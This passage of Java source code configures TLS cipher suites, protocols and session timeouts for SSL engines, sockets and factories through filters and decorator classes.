seconds. 
*/ private String sessionTimeout; /** * Returns the optional explicitly configured cipher suites for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setCipherSuitesFilter(FilterParameters)} */ public CipherSuitesParameters getCipherSuites() { return cipherSuites; } /** * Sets the optional explicitly configured cipher suites for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setCipherSuitesFilter(FilterParameters)} * * @param cipherSuites the suite configuration */ public void setCipherSuites(CipherSuitesParameters cipherSuites) { this.cipherSuites = cipherSuites; } /** * Returns the optional cipher suite filter for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setCipherSuites(CipherSuitesParameters)} is * called with a non {@code null} argument. */ public FilterParameters getCipherSuitesFilter() { return cipherSuitesFilter; } /** * Sets the optional cipher suite filter for this JSSE configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setCipherSuites(CipherSuitesParameters)} is * called with a non {@code null} argument. 
* * @param cipherSuitesFilter the filter configuration */ public void setCipherSuitesFilter(FilterParameters cipherSuitesFilter) { this.cipherSuitesFilter = cipherSuitesFilter; } /** * Returns the explicitly configured secure socket protocol names for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setSecureSocketProtocolsFilter(FilterParameters)} */ public SecureSocketProtocolsParameters getSecureSocketProtocols() { return secureSocketProtocols; } /** * Sets the explicitly configured secure socket protocol names for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setSecureSocketProtocolsFilter(FilterParameters)} */ public void setSecureSocketProtocols(SecureSocketProtocolsParameters secureSocketProtocols) { this.secureSocketProtocols = secureSocketProtocols; } /** * Returns the optional secure socket protocol filter for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setSecureSocketProtocols(SecureSocketProtocolsParameters)} is * called with a non-{@code null} argument. */ public FilterParameters getSecureSocketProtocolsFilter() { return secureSocketProtocolsFilter; } /** * Sets the optional secure socket protocol filter for this JSSE configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. 
* <p/> * These values are ignored if {@link #setSecureSocketProtocols(SecureSocketProtocolsParameters)} is * called with a non-{@code null} argument. * * @param secureSocketProtocolsFilter the filter configuration */ public void setSecureSocketProtocolsFilter(FilterParameters secureSocketProtocolsFilter) { this.secureSocketProtocolsFilter = secureSocketProtocolsFilter; } /** * Returns the optional {@link SSLSessionContext} timeout time for {@link javax.net.ssl.SSLSession}s * in seconds. */ public String getSessionTimeout() { return sessionTimeout; } /** * Sets the optional {@link SSLSessionContext} timeout time for {@link javax.net.ssl.SSLSession}s * in seconds. * * @param sessionTimeout the timeout value or {@code null} to use the default */ public void setSessionTimeout(String sessionTimeout) { this.sessionTimeout = sessionTimeout; } /** * Returns a flag indicating if default values should be applied in the event that no other property * of the instance configures a particular aspect of the entity produced by the instance. * This flag is used to allow instances of this class to produce a configurer that simply * passes through the current configuration of a configured entity when the instance of this * class would otherwise only apply some default configuration. * * @see SSLContextClientParameters * @see SSLContextServerParameters */ protected boolean getAllowPassthrough() { return false; } /** * Configures the actual {@link SSLContext} itself with direct setter calls. This method differs from * configuration options that are handled by a configurer instance in that the options are part of the * context itself and are not part of some factory or instance object returned by the context. 
* * @param context the context to configure * * @throws GeneralSecurityException if there is an error configuring the context */ protected void configureSSLContext(SSLContext context) throws GeneralSecurityException { LOG.trace("Configuring client and server side SSLContext parameters on SSLContext [{}]...", context); if (this.getSessionTimeout() != null) { LOG.debug("Configuring client and server side SSLContext session timeout on SSLContext [{}] to [{}]", context, this.getSessionTimeout()); this.configureSessionContext(context.getClientSessionContext(), this.getSessionTimeout()); this.configureSessionContext(context.getServerSessionContext(), this.getSessionTimeout()); } LOG.trace("Configured client and server side SSLContext parameters on SSLContext [{}].", context); } protected FilterParameters getDefaultCipherSuitesFilter() { FilterParameters filter = new FilterParameters(); filter.getInclude().addAll(DEFAULT_CIPHER_SUITES_FILTER_INCLUDE); filter.getExclude().addAll(DEFAULT_CIPHER_SUITES_FILTER_EXCLUDE); return filter; } protected FilterParameters getDefaultSecureSocketProcotolFilter() { FilterParameters filter = new FilterParameters(); filter.getInclude().addAll(DEFAULT_SECURE_SOCKET_PROTOCOLS_FILTER_INCLUDE); return filter; } /** * Returns the list of configurers to apply to an {@link SSLEngine} in order * to fully configure it in compliance with the provided configuration options. * The configurers are to be applied in the order in which they appear in the list. * * @param context the context that serves as the factory for {@code SSLEngine} instances * * @return the needed configurers */ protected List<Configurer<SSLEngine>> getSSLEngineConfigurers(SSLContext context) { final List<String> enabledCipherSuites = this.getCipherSuites() == null ? 
null : this.parsePropertyValues(this.getCipherSuites().getCipherSuite()); final Patterns enabledCipherSuitePatterns; final Patterns defaultEnabledCipherSuitePatterns = this.getDefaultCipherSuitesFilter().getPatterns(); if (this.getCipherSuitesFilter() != null) { enabledCipherSuitePatterns = this.getCipherSuitesFilter().getPatterns(); } else { enabledCipherSuitePatterns = null; } /// final List<String> enabledSecureSocketProtocols = this.getSecureSocketProtocols() == null ? null : this.parsePropertyValues(this.getSecureSocketProtocols().getSecureSocketProtocol()); final Patterns enabledSecureSocketProtocolsPatterns; final Patterns defaultEnabledSecureSocketProtocolsPatterns = this.getDefaultSecureSocketProcotolFilter().getPatterns(); if (this.getSecureSocketProtocolsFilter() != null) { enabledSecureSocketProtocolsPatterns = this.getSecureSocketProtocolsFilter().getPatterns(); } else { enabledSecureSocketProtocolsPatterns = null; } // final boolean allowPassthrough = getAllowPassthrough(); ////// Configurer<SSLEngine> sslEngineConfigurer = new Configurer<SSLEngine>() { @Override public SSLEngine configure(SSLEngine engine) { Collection<String> filteredCipherSuites = BaseSSLContextParameters.this .filter(enabledCipherSuites, Arrays.asList(engine.getSSLParameters().getCipherSuites()), Arrays.asList(engine.getEnabledCipherSuites()), enabledCipherSuitePatterns, defaultEnabledCipherSuitePatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_ENGINE_CIPHER_SUITE_LOG_MSG, new Object[] {engine, enabledCipherSuites, enabledCipherSuitePatterns, engine.getSSLParameters().getCipherSuites(), engine.getEnabledCipherSuites(), defaultEnabledCipherSuitePatterns, filteredCipherSuites}); } engine.setEnabledCipherSuites(filteredCipherSuites.toArray(new String[filteredCipherSuites.size()])); Collection<String> filteredSecureSocketProtocols = BaseSSLContextParameters.this .filter(enabledSecureSocketProtocols, Arrays.asList(engine.getSSLParameters().getProtocols()), 
Arrays.asList(engine.getEnabledProtocols()), enabledSecureSocketProtocolsPatterns, defaultEnabledSecureSocketProtocolsPatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_ENGINE_PROTOCOL_LOG_MSG, new Object[] {engine, enabledSecureSocketProtocols, enabledSecureSocketProtocolsPatterns, engine.getSSLParameters().getProtocols(), engine.getEnabledProtocols(), defaultEnabledSecureSocketProtocolsPatterns, filteredSecureSocketProtocols}); } engine.setEnabledProtocols(filteredSecureSocketProtocols.toArray(new String[filteredSecureSocketProtocols.size()])); return engine; } }; List<Configurer<SSLEngine>> sslEngineConfigurers = new LinkedList<Configurer<SSLEngine>>(); sslEngineConfigurers.add(sslEngineConfigurer); return sslEngineConfigurers; } /** * Returns the list of configurers to apply to an {@link SSLSocketFactory} in order * to fully configure it in compliance with the provided configuration options. * The configurers are to be applied in the order in which they appear in the list. * <p/> * It is preferred to use {@link #getSSLSocketFactorySSLSocketConfigurers(SSLContext)} instead * of this method as {@code SSLSocketFactory} does not contain any configuration options that * are non-proprietary. 
* * @param context the context that serves as the factory for {@code SSLSocketFactory} instances * * @return the needed configurers * * @see #getSSLSocketFactorySSLSocketConfigurers(SSLContext) */ protected List<Configurer<SSLSocketFactory>> getSSLSocketFactoryConfigurers(SSLContext context) { final List<Configurer<SSLSocket>> sslSocketConfigurers = this.getSSLSocketFactorySSLSocketConfigurers(context); Configurer<SSLSocketFactory> sslSocketFactoryConfigurer = new Configurer<SSLSocketFactory>() { @Override public SSLSocketFactory configure(SSLSocketFactory factory) { return new SSLSocketFactoryDecorator( factory, sslSocketConfigurers); } }; List<Configurer<SSLSocketFactory>> sslSocketFactoryConfigurers = new LinkedList<Configurer<SSLSocketFactory>>(); sslSocketFactoryConfigurers.add(sslSocketFactoryConfigurer); return sslSocketFactoryConfigurers; } /** * Returns the list of configurers to apply to an {@link SSLServerSocketFactory} in order * to fully configure it in compliance with the provided configuration options. * The configurers are to be applied in the order in which they appear in the list. * <p/> * It is preferred to use {@link #getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext)} instead * of this method as {@code SSLServerSocketFactory} does not contain any configuration options that * are non-proprietary. 
     * @param context the context that serves as the factory for {@code SSLServerSocketFactory} instances
     *
     * @return the needed configurers
     *
     * @see #getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext)
     */
    protected List<Configurer<SSLServerSocketFactory>> getSSLServerSocketFactoryConfigurers(SSLContext context) {
        // Per-server-socket configurers are captured by the decorator so every
        // server socket produced by the factory is configured on creation.
        final List<Configurer<SSLServerSocket>> sslServerSocketConfigurers =
                this.getSSLServerSocketFactorySSLServerSocketConfigurers(context);

        Configurer<SSLServerSocketFactory> sslServerSocketFactoryConfigurer = new Configurer<SSLServerSocketFactory>() {
            @Override
            public SSLServerSocketFactory configure(SSLServerSocketFactory factory) {
                return new SSLServerSocketFactoryDecorator(
                        factory,
                        sslServerSocketConfigurers);
            }
        };

        List<Configurer<SSLServerSocketFactory>> sslServerSocketFactoryConfigurers =
                new LinkedList<Configurer<SSLServerSocketFactory>>();
        sslServerSocketFactoryConfigurers.add(sslServerSocketFactoryConfigurer);

        return sslServerSocketFactoryConfigurers;
    }

    /**
     * Returns the list of configurers to apply to an {@link SSLSocket} in order
     * to fully configure it in compliance with the provided configuration
     * options. These configurers are intended for sockets produced by a
     * {@link SSLSocketFactory}, see
     * {@link #getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext)} for
     * configurers related to sockets produced by a
     * {@link SSLServerSocketFactory}. The configurers are to be applied in
     * the order in which they appear in the list.
     *
     * @param context the context that serves as the factory for
     *            {@code SSLSocketFactory} instances
     *
     * @return the needed configurers
     */
    protected List<Configurer<SSLSocket>> getSSLSocketFactorySSLSocketConfigurers(SSLContext context) {
        // Explicit cipher-suite list takes precedence over filter patterns;
        // null when no explicit suites were configured.
        final List<String> enabledCipherSuites = this.getCipherSuites() == null
                ? null : this.parsePropertyValues(this.getCipherSuites().getCipherSuite());

        final Patterns enabledCipherSuitePatterns;
        final Patterns defaultEnabledCipherSuitePatterns = this.getDefaultCipherSuitesFilter().getPatterns();

        if (this.getCipherSuitesFilter() != null) {
            enabledCipherSuitePatterns = this.getCipherSuitesFilter().getPatterns();
        } else {
            enabledCipherSuitePatterns = null;
        }

        // Same resolution for protocols: explicit list, then configured filter,
        // then the default filter patterns.
        final List<String> enabledSecureSocketProtocols = this.getSecureSocketProtocols() == null
                ? null : this.parsePropertyValues(this.getSecureSocketProtocols().getSecureSocketProtocol());
        final Patterns enabledSecureSocketProtocolsPatterns;
        final Patterns defaultEnabledSecureSocketProtocolsPatterns =
                this.getDefaultSecureSocketProcotolFilter().getPatterns();

        if (this.getSecureSocketProtocolsFilter() != null) {
            enabledSecureSocketProtocolsPatterns = this.getSecureSocketProtocolsFilter().getPatterns();
        } else {
            enabledSecureSocketProtocolsPatterns = null;
        }

        // When pass-through is allowed, defaults are NOT applied (the filter's
        // applyDefaults flag is the negation of this value).
        final boolean allowPassthrough = getAllowPassthrough();

        Configurer<SSLSocket> sslSocketConfigurer = new Configurer<SSLSocket>() {
            @Override
            public SSLSocket configure(SSLSocket socket) {
                // Filter against the socket's supported/current cipher suites
                // and apply the result.
                Collection<String> filteredCipherSuites = BaseSSLContextParameters.this
                        .filter(enabledCipherSuites,
                                Arrays.asList(socket.getSSLParameters().getCipherSuites()),
                                Arrays.asList(socket.getEnabledCipherSuites()),
                                enabledCipherSuitePatterns, defaultEnabledCipherSuitePatterns,
                                !allowPassthrough);

                if (LOG.isDebugEnabled()) {
                    LOG.debug(SSL_SOCKET_CIPHER_SUITE_LOG_MSG,
                              new Object[] {socket,
                                            enabledCipherSuites,
                                            enabledCipherSuitePatterns,
                                            socket.getSSLParameters().getCipherSuites(),
                                            socket.getEnabledCipherSuites(),
                                            defaultEnabledCipherSuitePatterns,
                                            filteredCipherSuites});
                }

                socket.setEnabledCipherSuites(filteredCipherSuites.toArray(new String[filteredCipherSuites.size()]));

                // Same treatment for secure-socket protocols.
                Collection<String> filteredSecureSocketProtocols = BaseSSLContextParameters.this
                        .filter(enabledSecureSocketProtocols,
                                Arrays.asList(socket.getSSLParameters().getProtocols()),
                                Arrays.asList(socket.getEnabledProtocols()),
                                enabledSecureSocketProtocolsPatterns,
                                defaultEnabledSecureSocketProtocolsPatterns,
                                !allowPassthrough);

                if (LOG.isDebugEnabled()) {
                    LOG.debug(SSL_SOCKET_PROTOCOL_LOG_MSG,
                              new Object[] {socket,
                                            enabledSecureSocketProtocols,
                                            enabledSecureSocketProtocolsPatterns,
                                            socket.getSSLParameters().getProtocols(),
                                            socket.getEnabledProtocols(),
                                            defaultEnabledSecureSocketProtocolsPatterns,
                                            filteredSecureSocketProtocols});
                }

                socket.setEnabledProtocols(filteredSecureSocketProtocols.toArray(new String[filteredSecureSocketProtocols.size()]));

                return socket;
            }
        };

        List<Configurer<SSLSocket>> sslSocketConfigurers = new LinkedList<Configurer<SSLSocket>>();
        sslSocketConfigurers.add(sslSocketConfigurer);

        return sslSocketConfigurers;
    }

    /**
     * Returns the list of configurers to apply to an {@link SSLServerSocket} in order
     * to fully configure it in compliance with the provided configuration
     * options. These configurers are intended for sockets produced by a
     * {@link SSLServerSocketFactory}, see
     * {@link #getSSLSocketFactorySSLSocketConfigurers(SSLContext)} for
     * configurers related to sockets produced by a
     * {@link SSLSocketFactory}. The configurers are to be applied in
     * the order in which they appear in the list.
     *
     * @param context the context that serves as the factory for
     *            {@code SSLServerSocketFactory} instances
     *
     * @return the needed configurers
     */
    protected List<Configurer<SSLServerSocket>> getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext context) {
        // Mirrors getSSLSocketFactorySSLSocketConfigurers, but server sockets
        // expose supported suites/protocols directly rather than via SSLParameters.
        final List<String> enabledCipherSuites = this.getCipherSuites() == null
                ? null : this.parsePropertyValues(this.getCipherSuites().getCipherSuite());

        final Patterns enabledCipherSuitePatterns;
        final Patterns defaultEnabledCipherSuitePatterns = this.getDefaultCipherSuitesFilter().getPatterns();

        if (this.getCipherSuitesFilter() != null) {
            enabledCipherSuitePatterns = this.getCipherSuitesFilter().getPatterns();
        } else {
            enabledCipherSuitePatterns = null;
        }

        final List<String> enabledSecureSocketProtocols = this.getSecureSocketProtocols() == null
                ? null : this.parsePropertyValues(this.getSecureSocketProtocols().getSecureSocketProtocol());
        final Patterns enabledSecureSocketProtocolsPatterns;
        final Patterns defaultEnabledSecureSocketProtocolsPatterns =
                this.getDefaultSecureSocketProcotolFilter().getPatterns();

        if (this.getSecureSocketProtocolsFilter() != null) {
            enabledSecureSocketProtocolsPatterns = this.getSecureSocketProtocolsFilter().getPatterns();
        } else {
            enabledSecureSocketProtocolsPatterns = null;
        }

        final boolean allowPassthrough = getAllowPassthrough();

        Configurer<SSLServerSocket> sslServerSocketConfigurer = new Configurer<SSLServerSocket>() {
            @Override
            public SSLServerSocket configure(SSLServerSocket socket) {
                Collection<String> filteredCipherSuites = BaseSSLContextParameters.this
                        .filter(enabledCipherSuites,
                                Arrays.asList(socket.getSupportedCipherSuites()),
                                Arrays.asList(socket.getEnabledCipherSuites()),
                                enabledCipherSuitePatterns, defaultEnabledCipherSuitePatterns,
                                !allowPassthrough);

                if (LOG.isDebugEnabled()) {
                    LOG.debug(SSL_SERVER_SOCKET_CIPHER_SUITE_LOG_MSG,
                              new Object[] {socket,
                                            enabledCipherSuites,
                                            enabledCipherSuitePatterns,
                                            socket.getSupportedCipherSuites(),
                                            socket.getEnabledCipherSuites(),
                                            defaultEnabledCipherSuitePatterns,
                                            filteredCipherSuites});
                }

                socket.setEnabledCipherSuites(filteredCipherSuites.toArray(new String[filteredCipherSuites.size()]));

                Collection<String> filteredSecureSocketProtocols = BaseSSLContextParameters.this
                        .filter(enabledSecureSocketProtocols,
                                Arrays.asList(socket.getSupportedProtocols()),
                                Arrays.asList(socket.getEnabledProtocols()),
                                enabledSecureSocketProtocolsPatterns,
                                defaultEnabledSecureSocketProtocolsPatterns,
                                !allowPassthrough);

                if (LOG.isDebugEnabled()) {
                    LOG.debug(SSL_SERVER_SOCKET_PROTOCOL_LOG_MSG,
                              new Object[] {socket,
                                            enabledSecureSocketProtocols,
                                            enabledSecureSocketProtocolsPatterns,
                                            socket.getSupportedProtocols(),
                                            socket.getEnabledProtocols(),
                                            defaultEnabledSecureSocketProtocolsPatterns,
                                            filteredSecureSocketProtocols});
                }

                socket.setEnabledProtocols(filteredSecureSocketProtocols.toArray(new String[filteredSecureSocketProtocols.size()]));

                return socket;
            }
        };

        List<Configurer<SSLServerSocket>> sslServerSocketConfigurers = new LinkedList<Configurer<SSLServerSocket>>();
        sslServerSocketConfigurers.add(sslServerSocketConfigurer);

        return sslServerSocketConfigurers;
    }

    /**
     * Configures a {@link SSLSessionContext}, client or server, with the supplied session timeout.
     *
     * @param sessionContext the context to configure
     * @param sessionTimeout the timeout time period
     * @throws GeneralSecurityException if {@code sessionContext} is {@code null}
     */
    protected void configureSessionContext(
            SSLSessionContext sessionContext, String sessionTimeout) throws GeneralSecurityException {

        int sessionTimeoutInt = Integer.parseInt(this.parsePropertyValue(sessionTimeout));

        if (sessionContext != null) {
            sessionContext.setSessionTimeout(sessionTimeoutInt);
        } else {
            throw new GeneralSecurityException(
                    "The SSLContext does not support SSLSessionContext, "
                            + "but a session timeout is configured. Set sessionTimeout to null "
                            + "to avoid this error.");
        }
    }

    /**
     * Filters the values in {@code availableValues} returning only the values that
     * are explicitly listed in {@code explicitValues} (returns them regardless
     * of if they appear in {@code availableValues} or not) if {@code explicitValues} is not
     * {@code null} or according to the following rules:
     * <ol>
     * <li>Match the include patterns in {@code patterns} and don't match the exclude patterns in {@code patterns}
     * if patterns is not {@code null}.</li>
     * <li>Match the include patterns in {@code defaultPatterns} and don't match the exclude patterns in {@code defaultPatterns}
     * if patterns is {@code null} and {@code applyDefaults} is true.</li>
     * <li>Are provided in currentValues if patterns is {@code null} and {@code applyDefaults} is false.</li>
     * </ol>
     *
     * @param explicitValues the optional explicit values to use
     * @param availableValues the available values to filter from
     * @param currentValues the values currently enabled; returned unchanged when no explicit values,
     *            no patterns, and no defaults apply
     * @param patterns the optional patterns to use when {@code explicitValues} is not used
     * @param defaultPatterns the required patterns to use when {@code explicitValues} and {@code patterns} are not used
     * @param applyDefaults flag indicating whether or not to apply defaults in the event that no explicit values and no
     *            patterns apply
     *
     * @return the filtered values
     *
     * @see #filter(Collection, Collection, List, List)
     */
    protected Collection<String> filter(
            Collection<String> explicitValues, Collection<String> availableValues,
            Collection<String> currentValues, Patterns patterns, Patterns defaultPatterns,
            boolean applyDefaults) {

        final List<Pattern> enabledIncludePatterns;
        final List<Pattern> enabledExcludePatterns;

        if (explicitValues == null && patterns == null && !applyDefaults) {
            // Pass-through: nothing configured and defaults disabled, so keep
            // whatever is currently enabled on the socket/engine.
            return currentValues;
        }

        if (patterns != null) {
            enabledIncludePatterns = patterns.getIncludes();
            enabledExcludePatterns = patterns.getExcludes();
        } else {
            enabledIncludePatterns = defaultPatterns.getIncludes();
            enabledExcludePatterns = defaultPatterns.getExcludes();
        }

        return this.filter(
                explicitValues,
                availableValues,
                enabledIncludePatterns, enabledExcludePatterns);
    }

    /**
     * Filters the values in {@code availableValues} returning only the values that
     * are explicitly listed in {@code explicitValues} (returns them regardless
     * of if they appear in {@code availableValues} or not) if {@code explicitValues} is not
     * {@code null} or as match the patterns in {@code includePatterns} and do
     * not match the patterns in {@code excludePatterns} if {@code explicitValues} is {@code null}.
     *
     * @param explicitValues the optional explicit values to use
     * @param availableValues the available values to filter from if {@code explicitValues} is {@code null}
     * @param includePatterns the patterns to use for inclusion filtering, required if {@code explicitValues} is {@code null}
     * @param excludePatterns the patterns to use for exclusion filtering, required if {@code explicitValues} is {@code null}
     *
     * @return the filtered values
     */
    protected Collection<String> filter(Collection<String> explicitValues, Collection<String> availableValues,
                                        List<Pattern> includePatterns, List<Pattern> excludePatterns) {
        Collection<String> returnValues;

        // Explicit list has precedence over filters, even when the list is
        // empty.
        if (explicitValues != null) {
            returnValues = new ArrayList<String>(explicitValues);
        } else {
            returnValues = new LinkedList<String>();
            for (String value : availableValues) {
                if (this.matchesOneOf(value, includePatterns)
                        && !this.matchesOneOf(value, excludePatterns)) {
                    returnValues.add(value);
                }
            }
        }

        return returnValues;
    }

    /**
     * Returns true if and only if the value is matched by one or more of the supplied patterns.
* * @param value the value to match * @param patterns the patterns to try to match against */ protected boolean matchesOneOf(String value, List<Pattern> patterns) { boolean matches = false; for (Pattern pattern : patterns) { Matcher matcher = pattern.matcher(value); if (matcher.matches()) { matches = true; break; } } return matches; } /** * Configures a {@code T} based on the related configuration options. */ interface Configurer<T> { /** * Configures a {@code T} based on the related configuration options. * The return value from this method may be {@code object} or it * may be a decorated instance there of. Consequently, any subsequent * actions on {@code object} must be performed using the returned value. * * @param object the object to configure * @return {@code object} or a decorated instance there of */ T configure(T object); } /** * Makes a decorated {@link SSLContext} appear as a normal {@code SSLContext}. */ protected static final class SSLContextDecorator extends SSLContext { public SSLContextDecorator(SSLContextSpiDecorator decorator) { super(decorator, decorator.getDelegate().getProvider(), decorator.getDelegate().getProtocol()); LOG.debug("SSLContextDecorator [{}] decorating SSLContext [{}].", this, decorator.getDelegate()); } @Override public String toString() { return String.format("SSLContext[hash=%h, provider=%s, protocol=%s, needClientAuth=%s, " + "wantClientAuth=%s\n\tdefaultProtocols=%s\n\tdefaultChiperSuites=%s\n\tsupportedProtocols=%s\n\tsupportedChiperSuites=%s\n]", hashCode(), getProvider(), getProtocol(), getDefaultSSLParameters().getNeedClientAuth(), getDefaultSSLParameters().getWantClientAuth(), collectionAsCommaDelimitedString(getDefaultSSLParameters().getProtocols()), collectionAsCommaDelimitedString(getDefaultSSLParameters().getCipherSuites()), collectionAsCommaDelimitedString(getSupportedSSLParameters().getProtocols()), collectionAsCommaDelimitedString(getSupportedSSLParameters().getCipherSuites())); } } /** * Class needed to provide 
decoration of an existing {@link SSLContext}. * Since {@code SSLContext} is an abstract class and requires an instance of * {@link SSLContextSpi}, this class effectively wraps an * {@code SSLContext} as if it were an {@code SSLContextSpi}, allowing us to * achieve decoration. */ protected static final class SSLContextSpiDecorator extends SSLContextSpi { private final SSLContext context; private final List<Configurer<SSLEngine>> sslEngineConfigurers; private final List<Configurer<SSLSocketFactory>> sslSocketFactoryConfigurers; private final List<Configurer<SSLServerSocketFactory>> sslServerSocketFactoryConfigurers; public SSLContextSpiDecorator(SSLContext context, List<Configurer<SSLEngine>> sslEngineConfigurers, List<Configurer<SSLSocketFactory>> sslSocketFactoryConfigurers, List<Configurer<SSLServerSocketFactory>> sslServerSocketFactoryConfigurers) { this.context = context; this.sslEngineConfigurers = sslEngineConfigurers; this.sslSocketFactoryConfigurers = sslSocketFactoryConfigurers; this.sslServerSocketFactoryConfigurers = sslServerSocketFactoryConfigurers; } @Override protected SSLEngine engineCreateSSLEngine() { SSLEngine engine = this.context.createSSLEngine(); LOG.debug("SSLEngine [{}] created from SSLContext [{}].", engine, context); this.configureSSLEngine(engine); return engine; } @Override protected SSLEngine engineCreateSSLEngine(String peerHost, int peerPort) { SSLEngine engine = this.context.createSSLEngine(peerHost, peerPort); LOG.debug("SSLEngine [{}] created from SSLContext [{}].", engine, context); return this.configureSSLEngine(engine); } @Override protected SSLSessionContext engineGetClientSessionContext() { return this.context.getClientSessionContext(); } @Override protected SSLSessionContext engineGetServerSessionContext() { return this.context.getServerSessionContext(); } @Override protected SSLServerSocketFactory engineGetServerSocketFactory() { SSLServerSocketFactory factory = this.context.getServerSocketFactory(); 
LOG.debug("SSLServerSocketFactoryEngine [{}] created from SSLContext [{}].", factory, context); return this.configureSSLServerSocketFactory(factory); } @Override protected SSLSocketFactory engineGetSocketFactory() { SSLSocketFactory factory = this.context.getSocketFactory(); LOG.debug("SSLSocketFactory [{}] created from SSLContext [{}].", factory, context); return this.configureSSLSocketFactory(factory); } @Override protected void engineInit(KeyManager[] km, TrustManager[] tm, SecureRandom random) throws KeyManagementException { this.context.init(km, tm, random); } protected SSLContext getDelegate() { return this.context; } /** * Configures an {@link SSLEngine} based on the configurers in instance. * The return value from this method may be {@code engine} or it may be * a decorated instance there of. Consequently, any subsequent actions * on {@code engine} must be performed using the returned value. * * @param engine the engine to configure * @return {@code engine} or a decorated instance there of */ protected SSLEngine configureSSLEngine(SSLEngine engine) { SSLEngine workingEngine = engine; for (Configurer<SSLEngine> configurer : this.sslEngineConfigurers) { workingEngine = configurer.configure(workingEngine); } return workingEngine; } /** * Configures an {@link SSLSocketFactory} based on the configurers in * this instance. The return value from this method may be * {@code factory} or it may be a decorated instance there of. * Consequently, any subsequent actions on {@code factory} must be * performed using the returned value. 
* * @param factory the factory to configure * @return {@code factory} or a decorated instance there of */ protected SSLSocketFactory configureSSLSocketFactory(SSLSocketFactory factory) { SSLSocketFactory workingFactory = factory; for (Configurer<SSLSocketFactory> configurer : this.sslSocketFactoryConfigurers) { workingFactory = configurer.configure(workingFactory); } return workingFactory; } /** * Configures an {@link SSLServerSocketFactory} based on the * configurers in this instance. The return value from this method may be * {@code factory} or it may be a decorated instance there of. * Consequently, any subsequent actions on {@code factory} must be * performed using the returned value. * * @param factory the factory to configure * @return {@code factory} or a decorated instance there of */ protected SSLServerSocketFactory configureSSLServerSocketFactory( SSLServerSocketFactory factory) { SSLServerSocketFactory workingFactory = factory; for (Configurer<SSLServerSocketFactory> configurer : this.sslServerSocketFactoryConfigurers) { workingFactory = configurer.configure(workingFactory); } return workingFactory; } } /** * A decorator that enables the application of configuration options to be * applied to created sockets even after this factory has been created and * turned over to client code. 
     */
    protected static final class SSLServerSocketFactoryDecorator extends SSLServerSocketFactory {

        // The wrapped factory that actually creates the server sockets.
        private final SSLServerSocketFactory sslServerSocketFactory;
        // Configurers applied, in order, to every server socket created.
        private final List<Configurer<SSLServerSocket>> sslServerSocketConfigurers;

        public SSLServerSocketFactoryDecorator(SSLServerSocketFactory sslServerSocketFactory,
                                               List<Configurer<SSLServerSocket>> sslServerSocketConfigurers) {
            this.sslServerSocketFactory = sslServerSocketFactory;
            this.sslServerSocketConfigurers = sslServerSocketConfigurers;
        }

        @Override
        public String[] getDefaultCipherSuites() {
            return this.sslServerSocketFactory.getDefaultCipherSuites();
        }

        @Override
        public String[] getSupportedCipherSuites() {
            return this.sslServerSocketFactory.getSupportedCipherSuites();
        }

        @Override
        public ServerSocket createServerSocket() throws IOException {
            return this.configureSocket(this.sslServerSocketFactory.createServerSocket());
        }

        @Override
        public ServerSocket createServerSocket(int port, int backlog,
                                               InetAddress ifAddress) throws IOException {
            return this.configureSocket(this.sslServerSocketFactory.createServerSocket(port, backlog, ifAddress));
        }

        @Override
        public ServerSocket createServerSocket(int port, int backlog) throws IOException {
            return this.configureSocket(this.sslServerSocketFactory.createServerSocket(port, backlog));
        }

        @Override
        public ServerSocket createServerSocket(int port) throws IOException {
            return this.configureSocket(this.sslServerSocketFactory.createServerSocket(port));
        }

        public SSLServerSocketFactory getDelegate() {
            return this.sslServerSocketFactory;
        }

        // Applies every registered configurer to a newly created server socket.
        // NOTE(review): assumes the delegate factory always produces SSLServerSocket
        // instances (the cast below would otherwise throw ClassCastException).
        private ServerSocket configureSocket(ServerSocket s) {
            SSLServerSocket workingSocket = (SSLServerSocket) s;

            LOG.debug("Created ServerSocket [{}] from SslServerSocketFactory [{}].", s, sslServerSocketFactory);

            for (Configurer<SSLServerSocket> configurer : this.sslServerSocketConfigurers) {
                workingSocket = configurer.configure(workingSocket);
            }

            return workingSocket;
        }
    }

    /**
     * A decorator that enables the application of configuration options to be
     * applied to created sockets even after this factory has been created and
     * turned over to client code.
     */
    protected static final class SSLSocketFactoryDecorator extends SSLSocketFactory {

        // The wrapped factory that actually creates the sockets.
        private final SSLSocketFactory sslSocketFactory;
        // Configurers applied, in order, to every socket created.
        private final List<Configurer<SSLSocket>> sslSocketConfigurers;

        public SSLSocketFactoryDecorator(SSLSocketFactory sslSocketFactory,
                                         List<Configurer<SSLSocket>> sslSocketConfigurers) {
            this.sslSocketFactory = sslSocketFactory;
            this.sslSocketConfigurers = sslSocketConfigurers;
        }

        @Override
        public String[] getDefaultCipherSuites() {
            return sslSocketFactory.getDefaultCipherSuites();
        }

        @Override
        public String[] getSupportedCipherSuites() {
            return sslSocketFactory.getSupportedCipherSuites();
        }

        @Override
        public Socket createSocket() throws IOException {
            return configureSocket(sslSocketFactory.createSocket());
        }

        @Override
